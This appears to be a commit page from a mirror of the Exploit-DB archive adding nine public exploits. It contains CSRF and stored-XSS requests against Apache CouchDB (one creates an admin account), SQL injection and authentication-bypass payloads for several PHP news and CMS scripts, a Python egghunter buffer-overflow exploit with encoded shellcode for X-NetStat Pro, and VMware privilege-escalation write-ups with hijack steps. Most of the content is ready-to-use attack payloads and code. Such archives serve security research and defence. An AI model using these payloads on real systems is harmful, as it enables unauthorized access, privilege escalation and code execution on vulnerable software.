bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-03-26

Browse source 
9 changes to exploits/shellcodes

X-NetStat Pro 5.63 - Local Buffer Overflow
VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation
VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation
Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting
Jettweb PHP Hazır Haber Sitesi Scripti V1 - SQL Injection
Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)
Jettweb PHP Hazır Haber Sitesi Scripti V3 - SQL Injection
Zeeways Jobsite CMS - 'id' SQL Injection
Zeeways Matrimony CMS - SQL Injection
This commit is contained in:
Offensive Security 2019-03-26 05:02:04 +00:00
parent 70225061cc
commit b5bccf8f35
10 changed files with 549 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

164
exploits/multiple/webapps/46595.txt Normal file
View file

@ -0,0 +1,164 @@
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery /
Cross-Site Scripting
# Date: 22.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.1
##################################################################################################################################
Introduction
A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.
#################################################################################
Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored
#################################################################################
CSRF1
Create Database
PUT /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 27
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
{"id":"test","name":"test"}
#################################################################################
CSRF2
Delete Database
DELETE /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
#################################################################################
CSRF3
Create Document
POST /test/ HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 18
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
{"testdoc":"test"}
#################################################################################
CSRF4
Create Admin
PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 10
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
"password"
#################################################################################
CSRF5 & XSS1 | DOM Based & Stored - Add Option
PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 6
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
"test"
#################################################################################
CSRF6 & XSS2 | DOM Based & Stored - Delete Option
DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
#################################################################################

46
exploits/php/webapps/46597.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V1 - Multiple Vulnerabilities
# Date: 23.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-5-php-hazir-haber-sitesi-scripti-v1.html
# Demo Site: http://haberv1.proemlaksitesi.net
# Version: V1
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/gallery.php?gallery_id=1
Vulnerable Parameter: gallery_id (GET)
Payload: gallery_id=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x63565549564d5a424e57746d6d62614e4f6e4a7559666a744d50557776636e4e6a6952504d494444,0x71626a7a71)--
UsCA
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/haberarsiv.php?cid=1
Vulnerable Parameter: cid (POST)
Payload: cid=1' UNION ALL SELECT
CONCAT(0x7162707a71,0x506a594d7a4f6c64674249466d746d6c5751486e786745667369685263624c6445654f665a4f4146,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
ihPG
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/arama.php?T1=btnVote=G%C3%B6nder&ara=1
Vulnerable Parameter: poll (POST)
Payload:
1&option=2&poll=-1'%20OR%203*2*1=6%20AND%20000889=000889%20--%20&stage=
----- PoC 4: SQLi -----
Request: http://localhost/[PATH]/uyelik.php
Vulnerable Parameter: option (POST)
Payload:
btnVote=G%C3%B6nder&option=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&poll=1&stage=2
----- PoC 5: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'

14
exploits/php/webapps/46598.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V2 - Authentication Bypass
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-6-php-hazir-haber-sitesi-scripti-v2.html
# Demo Site: http://haberv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'

47
exploits/php/webapps/46599.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V3 - Multiple Vulnerabilities
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-16-php-hazir-haber-sitesi-scripti-v3.html
# Demo Site: http://haberv3.proemlaksitesi.net
# Version: V3
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/fonksiyonlar.php
Vulnerable Parameter: videoid (GET)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/datagetir.php
Vulnerable Parameter: q (GET)
Payload:
datagetir.php?deger=undefined&dog=undefined&komut=ilcegetir&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&son=undefined
----- PoC 4: SQLi -----
Request: http://localhost/[PATH]kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb
----- PoC 5: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/yonetim/login.php
Username: '=' 'or'
Password: '=' 'or'

32
exploits/php/webapps/46602.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Zeeways Jobsite CMS - 'id' SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/jobsite-cms/1/productdetail
# Demo Site: http://www.zeewayscms.com/jobsite/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/news_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/jobs_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/job_cmp_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

33
exploits/php/webapps/46603.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Zeeways Matrimony CMS - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/matrimony-cms/4/productdetail
# Demo Site: http://www.zeewayscms.com/matrimony/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: up_cast (POST)
Payload: (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),CHAR(48),CHAR(117),CHAR(107)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: s_mother (GET)
Payload: (select 1 and row(1%2C1)>(select
count(*)%2Cconcat(concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(113)%2CCHAR(82)%2CCHAR(106)%2CCHAR(97)%2CCHAR(51)%2CCHAR(113)%2CCHAR(122)%2CCHAR(116))%2Cfloor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/profile_list?s_mother=1
Vulnerable Parameter: s_religion (POST)
Payload: (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(86),CHAR(74),CHAR(77),CHAR(54),CHAR(109),CHAR(84),CHAR(73)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))

133
exploits/windows/local/46596.py Executable file
View file

@ -0,0 +1,133 @@
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-23 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Vendor Homepage: https://freshsoftware.com #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe #
# Version: 5.63 #
# Special Thanks to my wife #
# The program has Local Buffer Overflow in several places. #
# Note: Although there are even more simple codes to this vulnerability, #
# this technique (EggHunter) has been used to run vulnerability in different windows versions. #
# Steps : #
# 1- Run python code : X-NetStat.py ( Three files are created ) #
# 2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL" #
# --> Enter --> Close HTTP Client window. #
# 3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok #
# --> Wait a litle --> Shellcode (Calc) open #
# Also Instead of the third stage you can : #
# File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" --> #
# Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#---------------------------------------------------------------------------------------------------------#
#------------------------------------ EGG Shellcode Generation ---------------------------------------
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"
f = open ("egg.txt", "w")
f.write(egg)
f.close()
#--------------------------------- EGG Hunter Shellcode Generation -----------------------------------
#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters
# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c"
egghunter += "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38"
egghunter += "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63"
egghunter += "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f"
egghunter += "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50"
egghunter += "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d"
egghunter += "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56"
egghunter += "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44"
egghunter += "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54"
egghunter += "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75"
egghunter += "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70"
egghunter += "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51"
egghunter += "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41"
# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"
eip = "\x77\x5a\x46"
buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip # Direct Eip Overflow
f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (264 - len(egghunter10)) + eip # Direct Eip Overflow
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()

31
exploits/windows/local/46600.txt Normal file
View file

@ -0,0 +1,31 @@
VMware: Host VMX Process Impersonation Hijack EoP
Platform: VMware Workstation Windows v14.1.5 (on Windows 10). Also tested VMware Player 15.0.2.
Class: Elevation of Privilege
Summary: The creation of the VMX process on a Windows host can be hijacked leading to elevation of privilege.
Description: The VMX process (vmware-vmx.exe) process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created with an elevated integrity level by the authentication daemon (vmware-authd.exe) which runs at SYSTEM. This prevents a non-administrator user opening the process and abusing its elevated access.
Unfortunately the process is created as the desktop user and follows the common pattern of impersonating the user while calling CreateProcessAsUser. This is an issue as the user has the ability to replace any drive letter for themselves, which allows a non-admin user to hijack the path to the VMX executable, allowing the user to get arbitrary code running as a “trusted” VMX process. While having an elevated integrity level isnt especially dangerous, the fact that arbitrary code is running as a “trusted” VMX process means you can access all the facilities for setting up VMs, such as the “opensecurable” command which allows the process to open almost any file as SYSTEM for arbitrary read/write access which could easily be used to get administrator privileges. Write file write access you could perform an attack similar to https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html.
I reported the technique of hijacking process creation to Microsoft over 3 years ago (see https://bugs.chromium.org/p/project-zero/issues/detail?id=351). Unfortunately Microsoft declined to fix it at the time. This makes fixing this issue more difficult than it should be. You might think a a quick fix would be to not impersonate the user over the call to CreateProcessAsUser. However you can end up with other issues such as (https://bugs.chromium.org/p/project-zero/issues/detail?id=692). Also even if the user didnt hijack the main process creation they could instead hijack DLLs loaded by the VMX process once started.
A more comprehensive fix would to not create the process as the desktop user, instead using another user identity, however that in itself has risks and makes things considerably more complex.
Proof of Concept:
Ive provided a PoC as a C#/C++ project. The C# application will perform the hijack and get the C++ vmware-vmx process
1) Compile the project. It will need to grab the NtApiDotNet from NuGet to work.
2) Ensure the compiled output directory has the files HijackVMXProcess.exe, NtApiDotNet.dll and vmware-vmx.exe.
3) Run HijackVMXProcess.exe. If successful you should find that instead of the installed version of vmware-vmx the fake one is running. You can also specify a path to HijackVMXProcess and the fake vmware-vmx will demonstrate opening the file using the opensecurable command for write access.
Expected Result:
The VMX process created is the version provided by VMWare.
Observed Result:
The VMX process is a fake one provided by the PoC which allows access to secured commands.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46600.zip

40
exploits/windows/local/46601.txt Normal file
View file

@ -0,0 +1,40 @@
VMware: Host VMX Process COM Class Hijack EoP
Platform: VMware Workstation Windows v14.1.5 (on Windows 10). Also tested VMware Player 15.
Class: Elevation of Privilege
Summary: COM classes used by the VMX process on a Windows host can be hijacked leading to elevation of privilege.
Description: The VMX process (vmware-vmx.exe) process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created with an elevated integrity level by the authentication daemon (vmware-authd.exe) which runs at SYSTEM. This prevents a non-administrator user opening the process and abusing its elevated access.
Unfortunately the process is created as the desktop user which results in the elevated process sharing resources such as COM registrations with the normal user who can modify the registry to force an arbitrary DLL to be loaded into the VMX process.
The COM classes observed to be loaded by the VMX process, and thus can be hijacked by modifying the registry are as follows:
1b1cad8c-2dab-11d2-b604-00104b703efd Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject
7c857801-7381-11cf-884d-00aa004b2e24 PSFactoryBuffer
8bc3f05e-d86b-11d0-a075-00c04fb68820 Windows Management and Instrumentation
bcde0395-e52f-467c-8e3d-c4579291692e MMDeviceEnumerator class
cb8555cc-9128-11d1-ad9b-00c04fd8fdff WbemAdministrativeLocator Class
d68af00a-29cb-43fa-8504-ce99a996d9ea Microsoft WBEM (non)Standard Marshaling for IWbemServices
e7d35cfa-348b-485e-b524-252725d697ca PSFactoryBuffer
The majority of these are related to WMI and are probably not critical so could be removed, however MMDeviceEnumerator is used to find audio devices which is probably important. Also note that hijacking COM classes isnt necessarily the only resource which could be hijacked. From a fixing perspective I don't know of any documented way of preventing the lookup of COM classes from HKEY_CURRENT_USER other than running the process as an administrator, about all you can do is not use COM at all. As with the other bug Ive reported at the same time a more comprehensive fix would probably to not create the process as the desktop user, instead using another user identity, however that in itself has risks.
Proof of Concept:
Ive provided a PoC as a C++ project.
1) Compile the project, make sure to compile the x64 version of the DLL otherwise the PoC will fail.
2) Copy the compiled HijackDll.dll to the folder c:\hijack.
3) Install the hijack.reg file using REGEDIT or the command line REG tool. This setups up a hijack of the CB8555CC-9128-11D1-AD9B-00C04FD8FDFF class.
4) Start a VMX instance using the normal GUI or vmrun.
Expected Result:
The system COM class is loaded into the VMX.
Observed Result:
The VMX process loads the hijack DLL into memory and a dialog box appears proving the code injection.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46601.zip

9
files_exploits.csv
View file

@ -10375,6 +10375,9 @@ id,file,description,date,author,type,platform,port
46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows, 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows, 46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows,
46584,exploits/windows/local/46584.py,"DVD X Player 5.5.3 - '.plf' Buffer Overflow",2019-03-21,"Paolo Perego",local,windows, 46584,exploits/windows/local/46584.py,"DVD X Player 5.5.3 - '.plf' Buffer Overflow",2019-03-21,"Paolo Perego",local,windows,
46596,exploits/windows/local/46596.py,"X-NetStat Pro 5.63 - Local Buffer Overflow",2019-03-25,"Peyman Forouzan",local,windows,
46600,exploits/windows/local/46600.txt,"VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
46601,exploits/windows/local/46601.txt,"VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41037,3 +41040,9 @@ id,file,description,date,author,type,platform,port
46591,exploits/php/webapps/46591.txt,"Matri4Web Matrimony Website Script - Multiple SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80 46591,exploits/php/webapps/46591.txt,"Matri4Web Matrimony Website Script - Multiple SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80
